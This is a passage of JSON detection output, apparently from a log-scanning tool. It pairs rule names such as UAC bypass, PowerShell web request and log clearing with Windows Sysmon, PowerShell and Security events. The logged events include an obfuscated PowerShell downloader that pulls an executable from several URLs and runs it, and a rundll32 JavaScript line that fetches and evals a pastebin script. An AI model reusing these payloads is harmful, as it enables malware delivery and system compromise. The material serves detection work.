16:27:10.777","Image":"C:\\Windows\\System32\\RuntimeBroker.exe","ProcessGuid":"747F3D96-1B5E-5F8B-0000-001034322200","ProcessId":2720,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\HCJVGQ5XQYJQFTRJAKRF.temp","UtcTime":"2020-10-17 
16:27:10.777"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":419627,"Execution":{"#attributes":{"ProcessID":3344,"ThreadID":4376}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-17T16:27:10.787882Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-10-17 16:27:10.777","Image":"C:\\Windows\\System32\\RuntimeBroker.exe","ProcessGuid":"747F3D96-1B5E-5F8B-0000-001034322200","ProcessId":2720,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\ff99ba2fb2e34b73.customDestinations-ms~RF6f668.TMP","UtcTime":"2020-10-17 16:27:10.777"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":419628,"Execution":{"#attributes":{"ProcessID":3344,"ThreadID":4376}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-17T16:27:10.791010Z"}},"Version":2}}}},{"detection":["Stop Windows Service"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"sc stop CDPSvc","Company":"Microsoft 
Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Service Control Manager Configuration Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF","Image":"C:\\Windows\\System32\\sc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-06A4-5E76-0000-002043DE0200","LogonId":"0x2de43","OriginalFileName":"sc.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-077C-5E76-0000-0010A5BA2300","ParentProcessId":5068,"ProcessGuid":"747F3D96-0A17-5E76-0000-001062373A00","ProcessId":4876,"Product":"Microsoft® Windows® Operating System","RuleName":"Persistence or Exec - Services Management","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-03-21 12:35:35.023"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":244333,"Execution":{"#attributes":{"ProcessID":2844,"ThreadID":3648}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-03-21T12:35:35.026859Z"}},"Version":5}}}},{"detection":["Service Execution"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"net start CDPSvc","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Net Command","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07","Image":"C:\\Windows\\System32\\net.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-06A4-5E76-0000-002043DE0200","LogonId":"0x2de43","OriginalFileName":"net.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-077C-5E76-0000-0010A5BA2300","ParentProcessId":5068,"ProcessGuid":"747F3D96-0A2B-5E76-0000-0010C02A3D00","ProcessId":7072,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-03-21 12:35:55.872"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":244336,"Execution":{"#attributes":{"ProcessID":2844,"ThreadID":3648}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-03-21T12:35:55.876452Z"}},"Version":5}}}},{"detection":["Service Execution"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\system32\\net1 start CDPSvc","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Net Command","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=085E23DF67774ED89FD0215E1F144824F79F812B,MD5=63DD4523677E62A73A8A7494DB321EA2,SHA256=C687157FD58EAA51757CDA87D06C30953A31F03F5356B9F5A9C004FA4BAD4BF5,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E","Image":"C:\\Windows\\System32\\net1.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-06A4-5E76-0000-002043DE0200","LogonId":"0x2de43","OriginalFileName":"net1.exe","ParentCommandLine":"net start CDPSvc","ParentImage":"C:\\Windows\\System32\\net.exe","ParentProcessGuid":"747F3D96-0A2B-5E76-0000-0010C02A3D00","ParentProcessId":7072,"ProcessGuid":"747F3D96-0A2B-5E76-0000-0010A92C3D00","ProcessId":7664,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-03-21 12:35:55.891"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":244337,"Execution":{"#attributes":{"ProcessID":2844,"ThreadID":3648}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-03-21T12:35:55.897450Z"}},"Version":5}}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-069C-5E76-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"whoami.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-08DA-5E76-0000-001054382E00","ParentProcessId":2632,"ProcessGuid":"747F3D96-0A33-5E76-0000-0010B8813D00","ProcessId":3696,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-03-21 12:36:03.899"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":244341,"Execution":{"#attributes":{"ProcessID":2844,"ThreadID":3648}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-03-21T12:36:03.901088Z"}},"Version":5}}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"nc.exe 127.0.0.1 
1337","Company":"?","CurrentDirectory":"c:\\Users\\Public\\Tools\\","Description":"?","FileVersion":"?","Hashes":"SHA1=08664F5C3E07862AB9B531848AC92D08C8C6BA5A,MD5=E0DB1D3D47E312EF62E5B0C74DCEAFE5,SHA256=B3B207DFAB2F429CC352BA125BE32A0CAE69FE4BF8563AB7D0128BBA8C57A71C,IMPHASH=98CE7B6533CBD67993E36DAFB4E95946","Image":"C:\\Users\\Public\\Tools\\nc.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-06A4-5E76-0000-002087DE0200","LogonId":"0x2de87","OriginalFileName":"?","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-06EF-5E76-0000-0010DC301A00","ParentProcessId":6236,"ProcessGuid":"747F3D96-0A36-5E76-0000-0010C8923D00","ProcessId":488,"Product":"?","RuleName":"suspicious execution path","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-03-21 12:36:06.987"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":244342,"Execution":{"#attributes":{"ProcessID":2844,"ThreadID":3648}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-03-21T12:36:06.990686Z"}},"Version":5}}}},{"detection":["Fax Service DLL Search Order 
Hijack"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=9D1873AEFC3F59E649F3FB822C1FA3D52C39970E,MD5=9B97E05E67107AA18BBF3E4F5F121B2B,SHA256=9915C62360EFF866C09072AF754FA70A9BD4BF4A73CDB4048F415002F7256AD0,IMPHASH=DF1295012B8EB2127DC3667CF1881634","Image":"C:\\Windows\\System32\\FXSSVC.exe","ImageLoaded":"C:\\Windows\\System32\\Ualapi.dll","OriginalFileName":"?","ProcessGuid":"747F3D96-E8A7-5F26-0000-0010230D1A00","ProcessId":5252,"Product":"?","RuleName":"","Signature":"","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2020-08-02 16:24:07.483"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":339882,"Execution":{"#attributes":{"ProcessID":3200,"ThreadID":3596}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":7,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-02T16:24:07.551366Z"}},"Version":3}}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-E308-5F26-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"whoami.exe","ParentCommandLine":"\"c:\\windows\\system32\\cmd.exe\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-E8BA-5F26-0000-001035BE1A00","ParentProcessId":8104,"ProcessGuid":"747F3D96-E8BC-5F26-0000-0010F7C41A00","ProcessId":588,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-08-02 16:24:28.637"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":339891,"Execution":{"#attributes":{"ProcessID":3200,"ThreadID":3032}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-02T16:24:28.640990Z"}},"Version":5}}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe -k LocalService -p -s fdPHost","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-90AF-610F-0000-0020E5030000","LogonId":"0x3e5","OriginalFileName":"svchost.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":632,"ProcessGuid":"747F3D96-182D-610F-0000-00100344D300","ProcessId":11196,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\LOCAL SERVICE","UtcTime":"2021-08-07 23:33:01.121"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":556726,"Execution":{"#attributes":{"ProcessID":3232,"ThreadID":4176}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2021-08-07T23:33:01.176666Z"}},"Version":5}}}},{"detection":["Local Accounts Discovery"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c start /min C:\\Users\\Public\\KDECO.bat reg delete hkcu\\Environment /v windir /f && REM \\system32\\AppHostRegistrationVerifier.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.592 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-1231-610F-0000-002057A80700","LogonId":"0x7a857","OriginalFileName":"Cmd.Exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":1108,"ProcessGuid":"747F3D96-183B-610F-0000-0010DC6CD400","ProcessId":11324,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2021-08-07 23:33:15.285"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":557006,"Execution":{"#attributes":{"ProcessID":3232,"ThreadID":4176}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2021-08-07T23:33:15.303423Z"}},"Version":5}}}},{"detection":["Windows PowerShell Web Request"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"MessageNumber":1,"MessageTotal":1,"Path":"","ScriptBlockId":"fdd51159-9602-40cb-839d-c31039ebbc3a","ScriptBlockText":"$Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\\WOrd\\2019\\ -itemtype DIrectOry;[Net.ServicePointManager]::\"SecURi`T`ypRO`T`oCOL\" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') 
neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/').\"S`Plit\"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.\"d`OWN`load`FIlE\"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_).\"le`NgTH\" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0')"},"System":{"Channel":"Microsoft-Windows-PowerShell/Operational","Computer":"DESKTOP-RIPCLIP","Correlation":{"#attributes":{"ActivityID":"CCAD9034-7B61-0001-83CF-ADCC617BD601"}},"EventID":4104,"EventRecordID":683,"Execution":{"#attributes":{"ProcessID":6620,"ThreadID":6340}},"Keywords":"0x0","Level":5,"Opcode":15,"Provider":{"#attributes":{"Guid":"A0C1853B-5C40-4B15-8766-3CF1C58F985A","Name":"Microsoft-Windows-PowerShell"}},"Security":{"#attributes":{"UserID":"S-1-5-21-2895499743-3664716236-3399808827-1001"}},"Task":2,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-26T05:09:28.845521Z"}},"Version":1}}}},{"detection":["(Built-in Logic) - Security audit log was 
cleared"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"System":{"Channel":"Security","Computer":"WIN-77LTAPHIQ1R.example.corp","Correlation":null,"EventID":1102,"EventRecordID":565591,"Execution":{"#attributes":{"ProcessID":780,"ThreadID":2472}},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"}},"Security":null,"Task":104,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-18T23:23:37.147709Z"}},"Version":0},"UserData":{"LogFileCleared":{"#attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"},"SubjectDomainName":"EXAMPLE","SubjectLogonId":"0x4fd77","SubjectUserName":"administrator","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-500"}}}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"System":{"Channel":"Security","Computer":"WIN-77LTAPHIQ1R.example.corp","Correlation":null,"EventID":1102,"EventRecordID":32853,"Execution":{"#attributes":{"ProcessID":736,"ThreadID":1592}},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"}},"Security":null,"Task":104,"TimeCreated":{"#attributes":{"SystemTime":"2019-01-20T07:00:50.800225Z"}},"Version":0},"UserData":{"LogFileCleared":{"#attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"},"SubjectDomainName":"EXAMPLE","SubjectLogonId":"0x35312","SubjectUserName":"Administrator","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-500"}}}}},{"detection":["(Built-in Logic) - Security audit log was 
cleared"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"System":{"Channel":"Security","Computer":"WIN-77LTAPHIQ1R.example.corp","Correlation":null,"EventID":1102,"EventRecordID":32950,"Execution":{"#attributes":{"ProcessID":736,"ThreadID":2372}},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"}},"Security":null,"Task":104,"TimeCreated":{"#attributes":{"SystemTime":"2019-01-20T07:29:57.863893Z"}},"Version":0},"UserData":{"LogFileCleared":{"#attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"},"SubjectDomainName":"EXAMPLE","SubjectLogonId":"0x35312","SubjectUserName":"Administrator","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-500"}}}}},{"detection":["Taskmgr as Parent"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\windows\\","Description":"Windows Command Processor","FileVersion":"10.0.18362.449 (WinBuild.160101.0800)","Hashes":"SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"00247C92-8C36-5F75-0000-002034E39103","LogonId":"0x391e334","OriginalFileName":"Cmd.Exe","ParentCommandLine":"C:\\windows\\system32\\taskmgr.exe","ParentImage":"C:\\Windows\\System32\\Taskmgr.exe","ParentProcessGuid":"00247C92-858E-5F7B-0000-00105241202B","ParentProcessId":18404,"ProcessGuid":"00247C92-858E-5F7B-0000-0010E741202B","ProcessId":6636,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":2,"User":"LAPTOP-JU4M3I0E\\bouss","UtcTime":"2020-10-05 
20:43:58.450"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":1,"EventRecordID":2164892,"Execution":{"#attributes":{"ProcessID":5424,"ThreadID":6708}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-05T20:43:58.451314Z"}},"Version":5}}}},{"detection":["HH.exe Execution"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\hh.exe\" C:\\Users\\IEUser\\Desktop\\Fax Record N104F.chm","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"Microsoft® HTML Help Executable","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=4B1E2F8EFBECB677080DBB26876311D9E06C5020,MD5=1CECEE8D02A8E9B19D3A1A65C7A2B249,SHA256=8AB2F9A4CA87575F03F554AEED6C5E0D7692FA9B5D420008A1521F7F7BD2D0A5,IMPHASH=D3D9C3E81A404E7F5C5302429636F04C","Image":"C:\\Windows\\hh.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-ABD5-5D3A-0000-0020EB990F00","LogonId":"0xf99eb","ParentCommandLine":"C:\\Windows\\Explorer.EXE","ParentImage":"C:\\Windows\\explorer.exe","ParentProcessGuid":"747F3D96-ABD7-5D3A-0000-001012661000","ParentProcessId":4940,"ProcessGuid":"747F3D96-AE22-5D3A-0000-001096B24E00","ProcessId":1504,"Product":"HTML Help","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-26 
07:39:14.345"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4348,"Execution":{"#attributes":{"ProcessID":5924,"ThreadID":6056}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-26T07:39:14.375565Z"}},"Version":5}}}},{"detection":["Suspicious Copy From or To System32","HTML Help Shell Spawn","Suspicious Rundll32 Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /c copy /Y C:\\Windows\\system32\\rundll32.exe %%TEMP%%\\out.exe > nul && %%TEMP%%\\out.exe javascript:\"\\..\\mshtml RunHTMLApplication \";document.write();h=new%%20ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");h.Open(\"GET\",\"http://pastebin.com/raw/y2CjnRtH\",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im out.exe\",0,true);}","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 